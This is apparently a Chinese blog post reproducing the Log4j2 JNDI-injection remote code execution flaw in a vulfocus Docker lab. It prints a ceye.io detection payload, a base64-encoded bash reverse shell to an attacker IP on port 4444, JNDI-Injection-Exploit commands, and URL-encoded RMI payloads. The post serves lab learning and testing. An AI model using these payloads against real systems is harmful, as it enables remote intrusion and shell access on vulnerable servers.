log4j2漏洞复现

log4j2是log4j的升级版本,基于java的日志框架,在java项目中被大量的引用,当用户输入数据被记录于日志中,攻击者可通过构造特殊请求,造成JNDI注入,来触发log4j达到命令执行,JNID可访问的目录服务有lLDAP,JDBC,RMI,DNS,NIS,CORBA,JNDI是java提供的一个java命令和目录接口,可通过其调用定位资产和程序对象。

1.拉取镜像文件:

docker pull vulfocus/log4j2-rce-2021-12-09

2.开启环境,替换8080端口避免冲突:

docker run -tid -p 38080:8080 vulfocus/log4j2-rce-2021-12-09

3.访问地址:

http://192.168.79.133:38080/

使用ceye验证是否包含Log4j2 RCE 漏洞,${jndi:ldap://vakqyv.ceye.io} ,然后进行URL编码。

看到有回显

4.JNDI注入反弹shell

bash -i >& /dev/tcp/192.168.79.133/4444 0>&1

将此条命令进行Java Runtime Bash 编码:bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4Ljc5LjEzMy80NDQ0IDA+JjEK}|{base64,-d}|{bash,-i}

编码后的命令通过-C参数输入JNDI工具,通过通过-A参数指定kali的ip地址:

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4Ljc5LjEzMy80NDQ0IDA+JjEK}|{base64,-d}|{bash,-i}" -A 192.168.79.133

5.监听4444端口

替换工具生成的payload:rmi://192.168.100.100:1099/kjauq 到Burpsuite:${jndi:rmi://192.168.79.133:1099/kjaukq}

URL编码后:%24%7Bjndi%3Armi%3A%2F%2F192.168.79.133%3A1099%2Fkjaukq%7D

发送

kali的监听窗口成功接收到反弹的shell

成功可以执行命令。

  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值